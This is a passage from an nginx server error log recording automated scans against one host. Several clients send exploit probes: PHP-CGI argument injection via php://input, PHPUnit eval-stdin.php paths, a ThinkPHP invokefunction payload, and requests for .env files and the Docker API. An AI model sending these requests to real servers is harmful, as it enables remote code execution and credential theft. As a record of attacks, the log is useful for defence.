(2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:32 [error] 952#952: *96961 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:32 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:38 [error] 952#952: *96961 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:38 [error] 952#952: *96961 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:41 [error] 952#952: *96961 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:41 [error] 952#952: *96961 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:44:42 [error] 952#952: *96961 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 09:57:02 [error] 952#952: *96987 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.82, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51" -2026/02/18 10:34:11 [error] 950#950: *96995 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 10:57:12 [error] 950#950: *97010 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 20.65.195.124, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "222.117.41.51" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 12:46:44 [error] 962#962: *98794 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 13:05:55 [error] 962#962: *98800 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.82, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51" -2026/02/18 13:15:31 [error] 967#967: *100366 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 162.142.125.35, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51" -2026/02/18 14:59:31 [error] 962#962: *100695 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:32 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:32 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: 